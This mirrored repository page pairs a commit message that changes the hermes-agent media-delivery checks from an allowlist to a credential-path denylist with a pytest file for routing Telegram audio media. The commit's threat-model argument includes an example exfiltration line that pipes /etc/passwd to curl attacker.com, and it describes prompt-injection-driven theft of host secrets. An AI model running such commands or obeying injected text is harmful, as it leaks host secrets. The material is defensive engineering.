mirror of
https://github.com/NousResearch/hermes-agent.git
synced 2026-06-03 07:21:54 +00:00
PR #29523 restricted MEDIA: paths and bare local paths in agent output to files under the Hermes media cache or an operator-allowlisted root, with a 10-minute recency window as a fallback. The intent was to defend against prompt-injection-driven exfiltration of host secrets, but in the default single-user setup the asymmetry doesn't earn its keep: we accept any document type the user uploads inbound (.md, .pdf, .txt, .docx, ...) and the agent already has terminal access — anything that can convince it to emit a MEDIA: tag for /etc/passwd can equally convince it to `cat /etc/passwd | curl attacker.com`. Practical breakage: agents that produced an .md, .pdf, or other artifact more than ~10 minutes ago, or outside the cache allowlist, showed the user a raw filepath in chat instead of the file. Default flipped to denylist-only: • /etc, /proc, /sys, /dev, /root, /boot, /var/{log,lib,run} • $HOME/{.ssh,.aws,.gnupg,.kube,.docker,.config,.azure,.gcloud} • macOS Library/Keychains • $HERMES_HOME/{.env, auth.json, credentials} The legacy allowlist+recency-window behavior stays available via opt-in: `gateway.strict: true` in config.yaml (or `HERMES_MEDIA_DELIVERY_STRICT=1`). Recommended for public-facing bots where prompt injection from one user shouldn't be able to exfiltrate the host's secrets to that same user. • `gateway/platforms/base.py` — `validate_media_delivery_path()` short-circuits to "return resolved if not under denylist" when strict is off. Strict mode preserves the original cache-then-allowlist-then-recency logic. New `_media_delivery_strict_mode()` reader for `HERMES_MEDIA_DELIVERY_STRICT`. • `hermes_cli/config.py` — `gateway.strict: false` added to DEFAULT_CONFIG; existing keys documented as "only consulted in strict mode." No `_config_version` bump needed (deep-merge picks up the new default for old installs). • `gateway/run.py` — bridges `gateway.strict` → `HERMES_MEDIA_DELIVERY_STRICT` at startup. 
• `tools/send_message_tool.py` — schema description broadened back to plain "any local path." • Tests — existing strict-path tests pinned to STRICT=1 so they keep exercising the legacy behavior; new `TestMediaDeliveryDefaultMode` with 8 cases covering the public default (stale .md accepted, any extension delivers, credential paths still blocked, strict env-var aliases, filter E2E). Validation: - tests/gateway/test_platform_base.py: 119/119 pass - tests/gateway/test_tts_media_routing.py: 7/7 pass - tests/tools/test_send_message_tool.py: 121/121 pass - tests/hermes_cli/test_kanban_notify.py: 12/12 pass - tests/cron/test_scheduler.py: 120/120 pass - E2E via execute_code with real imports: • stale .md outside allowlist → accepted (default) • same path with STRICT=1 → rejected • $HOME/.ssh/id_rsa → rejected (default) • filter_local_delivery_paths([md, key]) → [md] only • gateway.strict in config.yaml → bridged to env (true=1, false=0)
263 lines
10 KiB
Python
263 lines
10 KiB
Python
"""
Tests for cross-platform audio/voice media routing.

These tests pin the expected delivery path for audio media files across
Telegram (where Bot-API sendAudio only accepts MP3/M4A and .ogg/.opus
only renders as a voice bubble when explicitly flagged) and via
``GatewayRunner._deliver_media_from_response``.
"""
|
|
|
|
from types import SimpleNamespace
|
|
from unittest.mock import AsyncMock, MagicMock
|
|
|
|
import pytest
|
|
|
|
from gateway.config import Platform, PlatformConfig
|
|
from gateway.platforms.base import BasePlatformAdapter, MessageEvent, MessageType, SendResult
|
|
from gateway.run import GatewayRunner
|
|
from gateway.session import SessionSource, build_session_key
|
|
|
|
|
|
class _MediaRoutingAdapter(BasePlatformAdapter):
    """Telegram-flavoured ``BasePlatformAdapter`` stub for media-routing tests.

    Every method returns a canned value and performs no network I/O, so the
    tests can drive the base class's message processing and observe which
    ``send_*`` method is chosen for a given media file.
    """

    def __init__(self):
        # Register as an enabled Telegram adapter with a dummy token.
        super().__init__(PlatformConfig(enabled=True, token="test"), Platform.TELEGRAM)

    async def connect(self):
        """Report a successful connection without connecting anywhere."""
        return True

    async def disconnect(self):
        """No-op: there is nothing to tear down."""
        pass

    async def send(self, chat_id, content=None, **kwargs):
        """Pretend the text message was sent and return a fixed result."""
        return SendResult(success=True, message_id="text")

    async def get_chat_info(self, chat_id):
        """Describe every chat as a direct message with the given id."""
        return {"id": chat_id, "type": "dm"}
|
|
|
|
|
|
def _event(thread_id=None):
    """Build a text ``MessageEvent`` from Telegram DM chat ``chat-1``.

    Args:
        thread_id: Optional thread identifier stored on the event's
            ``SessionSource``; defaults to ``None``.

    Returns:
        A ``MessageEvent`` with text ``"make speech"`` and message id
        ``"msg-1"``.
    """
    source = SessionSource(
        platform=Platform.TELEGRAM,
        chat_id="chat-1",
        chat_type="dm",
        thread_id=thread_id,
    )
    return MessageEvent(
        text="make speech",
        message_type=MessageType.TEXT,
        source=source,
        message_id="msg-1",
    )
|
|
|
|
|
|
def _allowed_media_path(tmp_path, monkeypatch, name):
    """Create a media file under a temporary root and allowlist that root.

    Writes ``<tmp_path>/media-cache/<name>`` (creating parent directories as
    needed) with placeholder bytes, then patches
    ``gateway.platforms.base.MEDIA_DELIVERY_SAFE_ROOTS`` so it contains only
    the ``media-cache`` directory.

    Args:
        tmp_path: Base directory for the test (pytest's ``tmp_path``).
        monkeypatch: Object exposing ``setattr(target, value)`` (pytest's
            ``monkeypatch`` fixture).
        name: File name, optionally with sub-directories, relative to the
            ``media-cache`` root.

    Returns:
        The resolved absolute path of the created file.
    """
    root = tmp_path / "media-cache"
    media_file = root / name
    media_file.parent.mkdir(parents=True, exist_ok=True)
    media_file.write_bytes(b"media")
    monkeypatch.setattr(
        "gateway.platforms.base.MEDIA_DELIVERY_SAFE_ROOTS",
        (root,),
    )
    return media_file.resolve()
|
|
|
|
|
|
@pytest.mark.asyncio
async def test_base_adapter_routes_telegram_flac_media_tag_to_document_sender(tmp_path, monkeypatch):
    """A ``MEDIA:`` tag for a .flac file is delivered with ``send_document``.

    The message handler returns only the ``MEDIA:<path>`` tag; the base
    adapter must await ``send_document`` once and never ``send_voice``.
    """
    adapter = _MediaRoutingAdapter()
    event = _event()
    media_file = _allowed_media_path(tmp_path, monkeypatch, "speech.flac")
    adapter._message_handler = AsyncMock(return_value=f"MEDIA:{media_file}")
    adapter.send_voice = AsyncMock(return_value=SendResult(success=True, message_id="voice"))
    adapter.send_document = AsyncMock(return_value=SendResult(success=True, message_id="doc"))

    await adapter._process_message_background(event, build_session_key(event.source))

    adapter.send_document.assert_awaited_once_with(
        chat_id="chat-1",
        file_path=str(media_file),
        metadata=None,
    )
    adapter.send_voice.assert_not_awaited()
|
|
|
|
|
|
@pytest.mark.asyncio
async def test_base_adapter_routes_non_voice_telegram_ogg_media_tag_to_document_sender(tmp_path, monkeypatch):
    """An .ogg ``MEDIA:`` tag without a voice flag goes to ``send_document``.

    The handler response carries no ``[[audio_as_voice]]`` marker, so the
    base adapter must await ``send_document`` once and never ``send_voice``.
    """
    adapter = _MediaRoutingAdapter()
    event = _event()
    media_file = _allowed_media_path(tmp_path, monkeypatch, "speech.ogg")
    adapter._message_handler = AsyncMock(return_value=f"MEDIA:{media_file}")
    adapter.send_voice = AsyncMock(return_value=SendResult(success=True, message_id="voice"))
    adapter.send_document = AsyncMock(return_value=SendResult(success=True, message_id="doc"))

    await adapter._process_message_background(event, build_session_key(event.source))

    adapter.send_document.assert_awaited_once_with(
        chat_id="chat-1",
        file_path=str(media_file),
        metadata=None,
    )
    adapter.send_voice.assert_not_awaited()
|
|
|
|
|
|
@pytest.mark.asyncio
async def test_base_adapter_routes_voice_tagged_telegram_ogg_media_tag_to_voice_sender(tmp_path, monkeypatch):
    """An .ogg ``MEDIA:`` tag preceded by ``[[audio_as_voice]]`` uses ``send_voice``.

    With the voice marker on the line before the tag, the base adapter must
    await ``send_voice`` once and never ``send_document``.
    """
    adapter = _MediaRoutingAdapter()
    event = _event()
    media_file = _allowed_media_path(tmp_path, monkeypatch, "speech.ogg")
    adapter._message_handler = AsyncMock(
        return_value=f"[[audio_as_voice]]\nMEDIA:{media_file}"
    )
    adapter.send_voice = AsyncMock(return_value=SendResult(success=True, message_id="voice"))
    adapter.send_document = AsyncMock(return_value=SendResult(success=True, message_id="doc"))

    await adapter._process_message_background(event, build_session_key(event.source))

    adapter.send_voice.assert_awaited_once_with(
        chat_id="chat-1",
        audio_path=str(media_file),
        metadata=None,
    )
    adapter.send_document.assert_not_awaited()
|
|
|
|
|
|
def _fake_runner(thread_meta):
    """Build a fake GatewayRunner-like object with the helper methods needed by
    _deliver_media_from_response.

    Args:
        thread_meta: Value that ``_thread_metadata_for_source`` returns for
            every source, regardless of the ``anchor`` argument.

    Returns:
        A ``SimpleNamespace`` exposing ``_thread_metadata_for_source`` and
        ``_reply_anchor_for_event``; the latter always returns ``None``.
    """
    runner = SimpleNamespace(
        _thread_metadata_for_source=lambda source, anchor=None: thread_meta,
        _reply_anchor_for_event=lambda event: None,
    )
    return runner
|
|
|
|
|
|
@pytest.mark.asyncio
async def test_streaming_delivery_routes_telegram_flac_media_tag_to_document_sender(tmp_path, monkeypatch):
    """``_deliver_media_from_response`` sends a .flac ``MEDIA:`` tag as a document.

    The call must await ``send_document`` once, passing the thread metadata
    supplied by the fake runner, and never ``send_voice``.
    """
    event = _event(thread_id="topic-1")
    media_file = _allowed_media_path(tmp_path, monkeypatch, "speech.flac")
    # Namespace adapter: extraction helpers come from the base class, while
    # every sender is an AsyncMock so the chosen route can be asserted.
    adapter = SimpleNamespace(
        name="test",
        extract_media=BasePlatformAdapter.extract_media,
        extract_images=BasePlatformAdapter.extract_images,
        extract_local_files=BasePlatformAdapter.extract_local_files,
        send_voice=AsyncMock(return_value=SendResult(success=True, message_id="voice")),
        send_document=AsyncMock(return_value=SendResult(success=True, message_id="doc")),
        send_image_file=AsyncMock(return_value=SendResult(success=True, message_id="image")),
        send_video=AsyncMock(return_value=SendResult(success=True, message_id="video")),
    )

    # Called unbound, with the fake runner standing in for ``self``.
    await GatewayRunner._deliver_media_from_response(
        _fake_runner({"thread_id": "topic-1"}),
        f"MEDIA:{media_file}",
        event,
        adapter,
    )

    adapter.send_document.assert_awaited_once_with(
        chat_id="chat-1",
        file_path=str(media_file),
        metadata={"thread_id": "topic-1"},
    )
    adapter.send_voice.assert_not_awaited()
|
|
|
|
|
|
@pytest.mark.asyncio
async def test_streaming_delivery_routes_non_voice_telegram_ogg_media_tag_to_document_sender(tmp_path, monkeypatch):
    """``_deliver_media_from_response`` sends an unflagged .ogg as a document.

    The response carries no ``[[audio_as_voice]]`` marker, so the call must
    await ``send_document`` once, passing the thread metadata supplied by
    the fake runner, and never ``send_voice``.
    """
    event = _event(thread_id="topic-1")
    media_file = _allowed_media_path(tmp_path, monkeypatch, "speech.ogg")
    # Namespace adapter: extraction helpers come from the base class, while
    # every sender is an AsyncMock so the chosen route can be asserted.
    adapter = SimpleNamespace(
        name="test",
        extract_media=BasePlatformAdapter.extract_media,
        extract_images=BasePlatformAdapter.extract_images,
        extract_local_files=BasePlatformAdapter.extract_local_files,
        send_voice=AsyncMock(return_value=SendResult(success=True, message_id="voice")),
        send_document=AsyncMock(return_value=SendResult(success=True, message_id="doc")),
        send_image_file=AsyncMock(return_value=SendResult(success=True, message_id="image")),
        send_video=AsyncMock(return_value=SendResult(success=True, message_id="video")),
    )

    # Called unbound, with the fake runner standing in for ``self``.
    await GatewayRunner._deliver_media_from_response(
        _fake_runner({"thread_id": "topic-1"}),
        f"MEDIA:{media_file}",
        event,
        adapter,
    )

    adapter.send_document.assert_awaited_once_with(
        chat_id="chat-1",
        file_path=str(media_file),
        metadata={"thread_id": "topic-1"},
    )
    adapter.send_voice.assert_not_awaited()
|
|
|
|
|
|
@pytest.mark.asyncio
async def test_streaming_delivery_routes_telegram_mp3_media_tag_to_voice_sender(tmp_path, monkeypatch):
    """MP3 audio on Telegram must go through send_voice (which routes to
    sendAudio internally); Telegram accepts MP3 for the audio player."""
    event = _event(thread_id="topic-1")
    media_file = _allowed_media_path(tmp_path, monkeypatch, "speech.mp3")
    # Namespace adapter: extraction helpers come from the base class, while
    # every sender is an AsyncMock so the chosen route can be asserted.
    adapter = SimpleNamespace(
        name="test",
        extract_media=BasePlatformAdapter.extract_media,
        extract_images=BasePlatformAdapter.extract_images,
        extract_local_files=BasePlatformAdapter.extract_local_files,
        send_voice=AsyncMock(return_value=SendResult(success=True, message_id="voice")),
        send_document=AsyncMock(return_value=SendResult(success=True, message_id="doc")),
        send_image_file=AsyncMock(return_value=SendResult(success=True, message_id="image")),
        send_video=AsyncMock(return_value=SendResult(success=True, message_id="video")),
    )

    # Called unbound, with the fake runner standing in for ``self``.
    await GatewayRunner._deliver_media_from_response(
        _fake_runner({"thread_id": "topic-1"}),
        f"MEDIA:{media_file}",
        event,
        adapter,
    )

    adapter.send_voice.assert_awaited_once_with(
        chat_id="chat-1",
        audio_path=str(media_file),
        metadata={"thread_id": "topic-1"},
    )
    adapter.send_document.assert_not_awaited()
|
|
|
|
|
|
@pytest.mark.asyncio
async def test_streaming_delivery_blocks_media_path_outside_allowed_roots(tmp_path, monkeypatch):
    """A ``MEDIA:`` path outside the safe roots is not delivered in strict mode.

    The target file sits next to, not inside, the allowlisted ``media-cache``
    directory. With strict mode forced on and recency trust disabled, neither
    ``send_document`` nor ``send_voice`` may be awaited.
    """
    event = _event(thread_id="topic-1")
    allowed_root = tmp_path / "media-cache"
    allowed_root.mkdir()
    secret = tmp_path / "outside.pdf"
    secret.write_bytes(b"%PDF secret")
    monkeypatch.setattr(
        "gateway.platforms.base.MEDIA_DELIVERY_SAFE_ROOTS",
        (allowed_root,),
    )
    # This test exercises the strict-allowlist path; force strict mode on
    # and disable recency trust so the freshly-written tmp_path file is not
    # auto-accepted by the trust window. (Recency trust is covered separately
    # in test_platform_base.py. The public default flipped to non-strict in
    # 2026-05; this test pins strict on explicitly.)
    monkeypatch.setenv("HERMES_MEDIA_DELIVERY_STRICT", "1")
    monkeypatch.setenv("HERMES_MEDIA_TRUST_RECENT_FILES", "0")
    # Namespace adapter: extraction helpers come from the base class, while
    # every sender is an AsyncMock so any delivery attempt can be detected.
    adapter = SimpleNamespace(
        name="test",
        extract_media=BasePlatformAdapter.extract_media,
        extract_images=BasePlatformAdapter.extract_images,
        extract_local_files=BasePlatformAdapter.extract_local_files,
        send_voice=AsyncMock(return_value=SendResult(success=True, message_id="voice")),
        send_document=AsyncMock(return_value=SendResult(success=True, message_id="doc")),
        send_image_file=AsyncMock(return_value=SendResult(success=True, message_id="image")),
        send_video=AsyncMock(return_value=SendResult(success=True, message_id="video")),
    )

    # Called unbound, with the fake runner standing in for ``self``.
    await GatewayRunner._deliver_media_from_response(
        _fake_runner({"thread_id": "topic-1"}),
        f"MEDIA:{secret}",
        event,
        adapter,
    )

    adapter.send_document.assert_not_awaited()
    adapter.send_voice.assert_not_awaited()
|